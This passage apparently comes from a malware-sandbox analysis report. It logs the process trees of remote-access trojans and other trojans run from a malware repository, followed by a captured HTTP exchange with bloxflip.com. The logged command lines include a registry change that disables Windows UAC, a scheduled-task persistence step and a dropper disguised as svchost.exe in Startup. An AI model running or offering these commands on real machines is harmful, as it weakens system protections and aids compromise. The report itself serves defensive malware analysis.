  /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
  2⤵
  PID:15116
- - C:\Windows\SysWOW64\reg.exe
    C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
    3⤵
    - Modifies registry key
    PID:12220
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\install.bat" "
  2⤵
  PID:15588
- - C:\Windows\SysWOW64\PING.EXE
    PING 127.0.0.1 -n 2
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:18656
- - C:\Windows\SysWOW64\Userdata\Userdata.exe
    "C:\Windows\SysWOW64\Userdata\Userdata.exe"
    3⤵
    PID:12836

C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\RAT\RevengeRAT.exe
"C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\RAT\RevengeRAT.exe"
1⤵
PID:8892
- C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
  "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
  2⤵
  PID:10116
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
    3⤵
    PID:6396
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\kz6ckmvl.cmdline"
    3⤵
    PID:16356
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2773.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcF0E7686F2C35433988191437889EE615.TMP"
      4⤵
      PID:13024
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\f-plca5d.cmdline"
    3⤵
    PID:19248
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4183.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc561C1913BEF04666887D995986C5BB26.TMP"
      4⤵
      PID:8816
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\4xoz84ye.cmdline"
    3⤵
    PID:13668
- - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe"
    3⤵
    PID:11960
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
      "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
      4⤵
      PID:11636
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
        5⤵
        
        PID:8692

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:9732

C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\RAT\VanToM-Rat.bat
"C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\RAT\VanToM-Rat.bat"
1⤵
PID:6820
- C:\Users\Admin\AppData\Roaming\VanToM Folder\Server.exe
  "C:\Users\Admin\AppData\Roaming\VanToM Folder\Server.exe"
  2⤵
  PID:14196

C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\RAT\WarzoneRAT.exe
"C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\RAT\WarzoneRAT.exe"
1⤵
PID:11332
- C:\Windows\SysWOW64\schtasks.exe
  "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jFvfxe" /XML "C:\Users\Admin\AppData\Local\Temp\tmpC176.tmp"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:10108
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
  2⤵
  PID:7356

C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\RAT\RevengeRAT.exe
"C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\RAT\RevengeRAT.exe"
1⤵
PID:7996
- C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
  "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
  2⤵
  PID:11552
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
    3⤵
    PID:13976

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:17580

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:19516

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:9612

C:\ProgramData\Windows\rutserv.exe
C:\ProgramData\Windows\rutserv.exe
1⤵
PID:19560
- C:\ProgramData\Windows\rfusclient.exe
  C:\ProgramData\Windows\rfusclient.exe
  2⤵
  PID:8980
- - C:\ProgramData\Windows\rfusclient.exe
    C:\ProgramData\Windows\rfusclient.exe /tray
    3⤵
    PID:4464
- C:\ProgramData\Windows\rfusclient.exe
  C:\ProgramData\Windows\rfusclient.exe /tray
  2⤵
  PID:15912

C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\Alerta.exe
"C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\Alerta.exe"
1⤵
PID:12184

C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\Alerta.exe
"C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\Alerta.exe"
1⤵
PID:18768

C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\Ana.exe
"C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\Ana.exe"
1⤵
PID:17624
- C:\Users\Admin\AppData\Local\Temp\AV.EXE
  "C:\Users\Admin\AppData\Local\Temp\AV.EXE"
  2⤵
  PID:4064
- C:\Users\Admin\AppData\Local\Temp\AV2.EXE
  "C:\Users\Admin\AppData\Local\Temp\AV2.EXE"
  2⤵
  PID:15948
- - C:\hG17766HlBnG17766\hG17766HlBnG17766.exe
    "\hG17766HlBnG17766\hG17766HlBnG17766.exe" "C:\Users\Admin\AppData\Local\Temp\AV2.EXE"
    3⤵
    PID:13940
- C:\Users\Admin\AppData\Local\Temp\DB.EXE
  "C:\Users\Admin\AppData\Local\Temp\DB.EXE"
  2⤵
  PID:12460
- - C:\Windows\SysWOW64\cmd.exe
    /c C:\Users\Admin\AppData\Local\Temp\~unins2671.bat "C:\Users\Admin\AppData\Local\Temp\DB.EXE"
    3⤵
    PID:19064
- C:\Users\Admin\AppData\Local\Temp\EN.EXE
  "C:\Users\Admin\AppData\Local\Temp\EN.EXE"
  2⤵
  PID:18384
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 18384 -s 1624
    3⤵
    - Program crash
    PID:3672
- C:\Users\Admin\AppData\Local\Temp\SB.EXE
  "C:\Users\Admin\AppData\Local\Temp\SB.EXE"
  2⤵
  PID:5704

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:20056

C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\ArcticBomb.exe
"C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\ArcticBomb.exe"
1⤵
PID:10728

C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\BlueScreen.exe
"C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\BlueScreen.exe"
1⤵
PID:7008

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:12124

C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\ColorBug.exe
"C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\ColorBug.exe"
1⤵
PID:8580

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:16696

C:\Windows\system32\verclsid.exe
"C:\Windows\system32\verclsid.exe" /S /C {B4BFCC3A-DB2C-424C-B029-7FE99A87C641} /I {000214E6-0000-0000-C000-000000000046} /X 0x401
1⤵
- System Binary Proxy Execution: Verclsid
PID:18660

C:\Windows\system32\verclsid.exe
"C:\Windows\system32\verclsid.exe" /S /C {B4BFCC3A-DB2C-424C-B029-7FE99A87C641} /I {000214E6-0000-0000-C000-000000000046} /X 0x401
1⤵
- System Binary Proxy Execution: Verclsid
PID:12932

C:\Windows\system32\verclsid.exe
"C:\Windows\system32\verclsid.exe" /S /C {DFFACDC5-679F-4156-8947-C5C76BC0B67F} /I {ADD8BA80-002B-11D0-8F0F-00C04FD7D062} /X 0x401
1⤵
- System Binary Proxy Execution: Verclsid
PID:3408

Network

DNS

8.8.8.8.in-addr.arpa

Remote address:

8.8.8.8:53

Request

8.8.8.8.in-addr.arpa

IN PTR

Response

8.8.8.8.in-addr.arpa

IN PTR

dnsgoogle
DNS

13.86.106.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

13.86.106.20.in-addr.arpa

IN PTR

Response
DNS

bloxflip.com

msedge.exe

Remote address:

8.8.8.8:53

Request

bloxflip.com

IN A

Response

bloxflip.com

IN A

104.18.30.95

bloxflip.com

IN A

104.18.31.95
GET

https://bloxflip.com/a/kriszti

msedge.exe

Remote address:

104.18.30.95:443

Request

GET /a/kriszti HTTP/1.1
Host: bloxflip.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
DNT: 1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 403 Forbidden

Date: Sat, 05 Oct 2024 16:02:55 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Frame-Options: SAMEORIGIN
Cache-Control: max-age=15
Expires: Sat, 05 Oct 2024 16:03:10 GMT
Set-Cookie: __cf_bm=znaDhnOIxvdm3ZSKhnWEvE3a9rSxGEpLq_6t0OR0A_Y-1728144175-1.0.1.1-Arz_gBy.Rid_Je1KKm1jOCCSlUA4NIv6g6sUSZaMuicBwd0QLdYk1XZb21SXEbtd3bLo9_4lBxI50GktdskzaQ; path=/; expires=Sat, 05-Oct-24 16:32:55 GMT; domain=.bloxflip.com; HttpOnly; Secure; SameSite=None
Vary: Accept-Encoding
referrer-policy: no-referrer
Content-Security-Policy: connect-src 'self' https://bloxflip.com https://bloxgame.com *.seondnsresolve.com *.seondfresolver.com *.deviceinfresolver.com *.seonintelligence.com https://bloxflip-frontend-staging.bazooki-infra.dev http://localhost:3000 *.studs.ltd *.bloxbill.com bloxbill.com wss://*.amazonaws.com *.amazonaws.com *.intentiq.com *.nitropay.com *.googleapis.com *.intercomcdn.com *.userway.org *.softswiss.net *.agechecker.net *.google.com *.google.ad *.google.ae *.google.com.af *.google.com.ag *.google.al *.google.am *.google.co.ao *.google.com.ar *.google.as *.google.at *.google.com.au *.google.az *.google.ba *.google.com.bd *.google.be *.google.bf *.google.bg *.google.com.bh *.google.bi *.google.bj *.google.com.bn *.google.com.bo *.google.com.br *.google.bs *.google.bt *.google.co.bw *.google.by *.google.com.bz *.google.ca *.google.cd *.google.cf *.google.cg *.google.ch *.google.ci *.google.co.ck *.google.cl *.google.cm *.google.cn *.google.com.co *.google.co.cr *.google.com.cu *.google.cv *.google.com.cy *.google.cz *.google.de *.google.dj *.google.dk *.google.dm *.google.com.do *.google.dz *.google.com.ec *.google.ee *.google.com.eg *.google.es *.google.com.et *.google.fi *.google.com.fj *.google.fm *.google.fr *.google.ga *.google.ge *.google.gg *.google.com.gh *.google.com.gi *.google.gl *.google.gm *.google.gr *.google.com.gt *.google.gy *.google.com.hk *.google.hn *.google.hr *.google.ht *.google.hu *.google.co.id *.google.ie *.google.co.il *.google.im *.google.co.in *.google.iq *.google.is *.google.it *.google.je *.google.com.jm *.google.jo *.google.co.jp *.google.co.ke *.google.com.kh *.google.ki *.google.kg *.google.co.kr *.google.com.kw *.google.kz *.google.la *.google.com.lb *.google.li *.google.lk *.google.co.ls *.google.lt *.google.lu *.google.lv *.google.com.ly *.google.co.ma *.google.md *.google.me *.google.mg *.google.mk *.google.ml *.google.com.mm *.google.mn *.google.com.mt *.google.mu *.google.mv *.google.mw *.google.com.mx *.google.com.my *.google.co.mz *.google.com.na *.google.com.ng *.google.com.ni *.google.ne *.google.nl *.google.no *.google.com.np *.google.nr *.google.nu *.google.co.nz *.google.com.om *.google.com.pa *.google.com.pe *.google.com.pg *.google.com.ph *.google.com.pk *.google.pl *.google.pn *.google.com.pr *.google.ps *.google.pt *.google.com.py *.google.com.qa *.google.ro *.google.ru *.google.rw *.google.com.sa *.google.com.sb *.google.sc *.google.se *.google.com.sg *.google.sh *.google.si *.google.sk *.google.com.sl *.google.sn *.google.so *.google.sm *.google.sr *.google.st *.google.com.sv *.google.td *.google.tg *.google.co.th *.google.com.tj *.google.tl *.google.tm *.google.tn *.google.to *.google.com.tr *.google.tt *.google.com.tw *.google.co.tz *.google.com.ua *.google.co.ug *.google.co.uk *.google.com.uy *.google.co.uz *.google.com.vc *.google.co.ve *.google.co.vi *.google.com.vn *.google.vu *.google.ws *.google.rs *.google.co.za *.google.co.zm *.google.co.zw *.google.cat bing.com *.bing.com apple.com *.apple.com cdn-apple.com *.cdn-apple.com taboola.com *.taboola.com onesignal.com *.onesignal.com intercom.io *.intercom.io blox.land *.blox.land termly.io *.termly.io api.ipify.org cdn.growthbook.io *.bloxflip.com stripe.com *.inteniq.com *.stripe.com *.roblox.com *.robloxlabs.com *.rbx.com *.rbxcdn.com *.roblox.cn *.simulpong.com *.lightstep.com *.ns1p.net *.arkoselabs.com *.kaptcha.com *.google.com *.google-analytics.com *.doubleclick.net *.sentry.io wss://*.intercom.io *.tiktok.com tiktok.com *.mixpanel.com wss://*.hotjar.io *.hotjar.io wss://*.bloxflip.com wss://realtime.roblox.com wss://realtime.sitetest1.robloxlabs.com wss://realtime.sitetest2.robloxlabs.com wss://realtime.sitetest3.robloxlabs.com wss://realtime-signalr.roblox.com *.braintree-api.com hcaptcha.com googletagmanager.com videodelivery.net *.cloudflarestream.com *.hcaptcha.com *.braintreegateway.com d1q2u37vreaobr.cloudfront.net funcaptcha.com; report-uri https://6513195608615f75764fb31f.endpoint.csper.io?v=0;
Server: cloudflare
CF-RAY: 8cdea388b8df569a-OSL
Content-Encoding: br
DNS

95.30.18.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

95.30.18.104.in-addr.arpa

IN PTR

Response
DNS

2.159.190.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

2.159.190.20.in-addr.arpa

IN PTR

Response
GET

https://bloxflip.com/cdn-cgi/styles/cf.errors.css

msedge.exe

Remote address:

104.18.30.95:443

Request

GET /cdn-cgi/styles/cf.errors.css HTTP/1.1
Host: bloxflip.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: text/css,*/*;q=0.1
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: style
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: __cf_bm=znaDhnOIxvdm3ZSKhnWEvE3a9rSxGEpLq_6t0OR0A_Y-1728144175-1.0.1.1-Arz_gBy.Rid_Je1KKm1jOCCSlUA4NIv6g6sUSZaMuicBwd0QLdYk1XZb21SXEbtd3bLo9_4lBxI50GktdskzaQ

Response

HTTP/1.1 200 OK

Date: Sat, 05 Oct 2024 16:02:57 GMT
Content-Type: text/css
Transfer-Encoding: chunked
Connection: close
Last-Modified: Tue, 01 Oct 2024 14:49:43 GMT
ETag: W/"66fc0c07-5df3"
Server: cloudflare
CF-RAY: 8cdea39318770b31-OSL
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Vary: Accept-Encoding
Expires: Sat, 05 Oct 2024 18:02:57 GMT
Cache-Control: max-age=7200
Cache-Control: public
Content-Encoding: gzip
DNS

83.210.23.2.in-addr.arpa

Remote address:

8.8.8.8:53

Request

83.210.23.2.in-addr.arpa

IN PTR

Response

83.210.23.2.in-addr.arpa

IN PTR

a2-23-210-83deploystaticakamaitechnologiescom
GET

https://bloxflip.com/cdn-cgi/images/browser-bar.png?1376755637

msedge.exe

Remote address:

104.18.30.95:443

Request

GET /cdn-cgi/images/browser-bar.png?1376755637 HTTP/2.0
host: bloxflip.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://bloxflip.com/cdn-cgi/styles/cf.errors.css
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: __cf_bm=znaDhnOIxvdm3ZSKhnWEvE3a9rSxGEpLq_6t0OR0A_Y-1728144175-1.0.1.1-Arz_gBy.Rid_Je1KKm1jOCCSlUA4NIv6g6sUSZaMuicBwd0QLdYk1XZb21SXEbtd3bLo9_4lBxI50GktdskzaQ

Response

HTTP/2.0 200

date: Sat, 05 Oct 2024 16:02:57 GMT
content-type: image/png
content-length: 3213
last-modified: Tue, 01 Oct 2024 14:49:43 GMT
etag: "66fc0c07-c8d"
server: cloudflare
cf-ray: 8cdea3983ec1656c-AMS
x-frame-options: DENY
x-content-type-options: nosniff
vary: Accept-Encoding
expires: Sat, 05 Oct 2024 18:02:57 GMT
cache-control: max-age=7200
cache-control: public
accept-ranges: bytes
GET

https://bloxflip.com/cdn-cgi/images/cf-no-screenshot-error.png

msedge.exe

Remote address:

104.18.30.95:443

Request

GET /cdn-cgi/images/cf-no-screenshot-error.png HTTP/2.0
host: bloxflip.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://bloxflip.com/cdn-cgi/styles/cf.errors.css
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: __cf_bm=znaDhnOIxvdm3ZSKhnWEvE3a9rSxGEpLq_6t0OR0A_Y-1728144175-1.0.1.1-Arz_gBy.Rid_Je1KKm1jOCCSlUA4NIv6g6sUSZaMuicBwd0QLdYk1XZb21SXEbtd3bLo9_4lBxI50GktdskzaQ

Response

HTTP/2.0 200

date: Sat, 05 Oct 2024 16:02:57 GMT
content-type: image/png
content-length: 715
last-modified: Tue, 01 Oct 2024 14:49:43 GMT
etag: "66fc0c07-2cb"
server: cloudflare
cf-ray: 8cdea3983ec0656c-AMS
x-frame-options: DENY
x-content-type-options: nosniff
vary: Accept-Encoding
expires: Sat, 05 Oct 2024 18:02:57 GMT
cache-control: max-age=7200
cache-control: public
accept-ranges: bytes
GET

https://bloxflip.com/cdn-cgi/challenge-platform/scripts/jsd/main.js

msedge.exe

Remote address:

104.18.30.95:443

Request

GET /cdn-cgi/challenge-platform/scripts/jsd/main.js HTTP/2.0
host: bloxflip.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: script
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: __cf_bm=znaDhnOIxvdm3ZSKhnWEvE3a9rSxGEpLq_6t0OR0A_Y-1728144175-1.0.1.1-Arz_gBy.Rid_Je1KKm1jOCCSlUA4NIv6g6sUSZaMuicBwd0QLdYk1XZb21SXEbtd3bLo9_4lBxI50GktdskzaQ

Response

HTTP/2.0 302

date: Sat, 05 Oct 2024 16:02:57 GMT
content-length: 0
location: /cdn-cgi/challenge-platform/h/g/scripts/jsd/ec4b873d446c/main.js?
cache-control: max-age=300, stale-if-error=10800, stale-while-revalidate=10800, public
access-control-allow-origin: *
vary: Accept-Encoding
referrer-policy: no-referrer
content-security-policy: connect-src 'self' https://bloxflip.com https://bloxgame.com *.seondnsresolve.com *.seondfresolver.com *.deviceinfresolver.com *.seonintelligence.com https://bloxflip-frontend-staging.bazooki-infra.dev http://localhost:3000 *.studs.ltd *.bloxbill.com bloxbill.com wss://*.amazonaws.com *.amazonaws.com *.intentiq.com *.nitropay.com *.googleapis.com *.intercomcdn.com *.userway.org *.softswiss.net *.agechecker.net *.google.com *.google.ad *.google.ae *.google.com.af *.google.com.ag *.google.al *.google.am *.google.co.ao *.google.com.ar *.google.as *.google.at *.google.com.au *.google.az *.google.ba *.google.com.bd *.google.be *.google.bf *.google.bg *.google.com.bh *.google.bi *.google.bj *.google.com.bn *.google.com.bo *.google.com.br *.google.bs *.google.bt *.google.co.bw *.google.by *.google.com.bz *.google.ca *.google.cd *.google.cf *.google.cg *.google.ch *.google.ci *.google.co.ck *.google.cl *.google.cm *.google.cn *.google.com.co *.google.co.cr *.google.com.cu *.google.cv *.google.com.cy *.google.cz *.google.de *.google.dj *.google.dk *.google.dm *.google.com.do *.google.dz *.google.com.ec *.google.ee *.google.com.eg *.google.es *.google.com.et *.google.fi *.google.com.fj *.google.fm *.google.fr *.google.ga *.google.ge *.google.gg *.google.com.gh *.google.com.gi *.google.gl *.google.gm *.google.gr *.google.com.gt *.google.gy *.google.com.hk *.google.hn *.google.hr *.google.ht *.google.hu *.google.co.id *.google.ie *.google.co.il *.google.im *.google.co.in *.google.iq *.google.is *.google.it *.google.je *.google.com.jm *.google.jo *.google.co.jp *.google.co.ke *.google.com.kh *.google.ki *.google.kg *.google.co.kr *.google.com.kw *.google.kz *.google.la *.google.com.lb *.google.li *.google.lk *.google.co.ls *.google.lt *.google.lu *.google.lv *.google.com.ly *.google.co.ma *.google.md *.google.me *.google.mg *.google.mk *.google.ml *.google.com.mm *.google.mn *.google.com.mt *.google.mu *.google.mv *.google.mw *.google.com.mx *.google.com.my *.google.co.mz *.google.com.na *.google.com.ng *.google.com.ni *.google.ne *.google.nl *.google.no *.google.com.np *.google.nr *.google.nu *.google.co.nz *.google.com.om *.google.com.pa *.google.com.pe *.google.com.pg *.google.com.ph *.google.com.pk *.google.pl *.google.pn *.google.com.pr *.google.ps *.google.pt *.google.com.py *.google.com.qa *.google.ro *.google.ru *.google.rw *.google.com.sa *.google.com.sb *.google.sc *.google.se *.google.com.sg *.google.sh *.google.si *.google.sk *.google.com.sl *.google.sn *.google.so *.google.sm *.google.sr *.google.st *.google.com.sv *.google.td *.google.tg *.google.co.th *.google.com.tj *.google.tl *.google.tm *.google.tn *.google.to *.google.com.tr *.google.tt *.google.com.tw *.google.co.tz *.google.com.ua *.google.co.ug *.google.co.uk *.google.com.uy *.google.co.uz *.google.com.vc *.google.co.ve *.google.co.vi *.google.com.vn *.google.vu *.google.ws *.google.rs *.google.co.za *.google.co.zm *.google.co.zw *.google.cat bing.com *.bing.com apple.com *.apple.com cdn-apple.com *.cdn-apple.com taboola.com *.taboola.com onesignal.com *.onesignal.com intercom.io *.intercom.io blox.land *.blox.land termly.io *.termly.io api.ipify.org cdn.growthbook.io *.bloxflip.com stripe.com *.inteniq.com *.stripe.com *.roblox.com *.robloxlabs.com *.rbx.com *.rbxcdn.com *.roblox.cn *.simulpong.com *.lightstep.com *.ns1p.net *.arkoselabs.com *.kaptcha.com *.google.com *.google-analytics.com *.doubleclick.net *.sentry.io wss://*.intercom.io *.tiktok.com tiktok.com *.mixpanel.com wss://*.hotjar.io *.hotjar.io wss://*.bloxflip.com wss://realtime.roblox.com wss://realtime.sitetest1.robloxlabs.com wss://realtime.sitetest2.robloxlabs.com wss://realtime.sitetest3.robloxlabs.com wss://realtime-signalr.roblox.com *.braintree-api.com hcaptcha.com googletagmanager.com videodelivery.net *.cloudflarestream.com *.hcaptcha.com *.braintreegateway.com d1q2u37vreaobr.cloudfront.net funcaptcha.com; report-uri https://6513195608615f75764fb31f.endpoint.csper.io?v=0;
server: cloudflare
cf-ray: 8cdea3983ec3656c-AMS
GET

https://bloxflip.com/cdn-cgi/challenge-platform/h/g/scripts/jsd/ec4b873d446c/main.js?

msedge.exe

Remote address:

104.18.30.95:443

Request

GET /cdn-cgi/challenge-platform/h/g/scripts/jsd/ec4b873d446c/main.js? HTTP/2.0
host: bloxflip.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: script
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: __cf_bm=znaDhnOIxvdm3ZSKhnWEvE3a9rSxGEpLq_6t0OR0A_Y-1728144175-1.0.1.1-Arz_gBy.Rid_Je1KKm1jOCCSlUA4NIv6g6sUSZaMuicBwd0QLdYk1XZb21SXEbtd3bLo9_4lBxI50GktdskzaQ

Response

HTTP/2.0 200

date: Sat, 05 Oct 2024 16:02:58 GMT
content-type: application/javascript; charset=UTF-8
cache-control: max-age=14400, stale-if-error=10800, stale-while-revalidate=10800, public
x-content-type-options: nosniff
vary: Accept-Encoding
referrer-policy: no-referrer
content-security-policy: connect-src 'self' https://bloxflip.com https://bloxgame.com *.seondnsresolve.com *.seondfresolver.com *.deviceinfresolver.com *.seonintelligence.com https://bloxflip-frontend-staging.bazooki-infra.dev http://localhost:3000 *.studs.ltd *.bloxbill.com bloxbill.com wss://*.amazonaws.com *.amazonaws.com *.intentiq.com *.nitropay.com *.googleapis.com *.intercomcdn.com *.userway.org *.softswiss.net *.agechecker.net *.google.com *.google.ad *.google.ae *.google.com.af *.google.com.ag *.google.al *.google.am *.google.co.ao *.google.com.ar *.google.as *.google.at *.google.com.au *.google.az *.google.ba *.google.com.bd *.google.be *.google.bf *.google.bg *.google.com.bh *.google.bi *.google.bj *.google.com.bn *.google.com.bo *.google.com.br *.google.bs *.google.bt *.google.co.bw *.google.by *.google.com.bz *.google.ca *.google.cd *.google.cf *.google.cg *.google.ch *.google.ci *.google.co.ck *.google.cl *.google.cm *.google.cn *.google.com.co *.google.co.cr *.google.com.cu *.google.cv *.google.com.cy *.google.cz *.google.de *.google.dj *.google.dk *.google.dm *.google.com.do *.google.dz *.google.com.ec *.google.ee *.google.com.eg *.google.es *.google.com.et *.google.fi *.google.com.fj *.google.fm *.google.fr *.google.ga *.google.ge *.google.gg *.google.com.gh *.google.com.gi *.google.gl *.google.gm *.google.gr *.google.com.gt *.google.gy *.google.com.hk *.google.hn *.google.hr *.google.ht 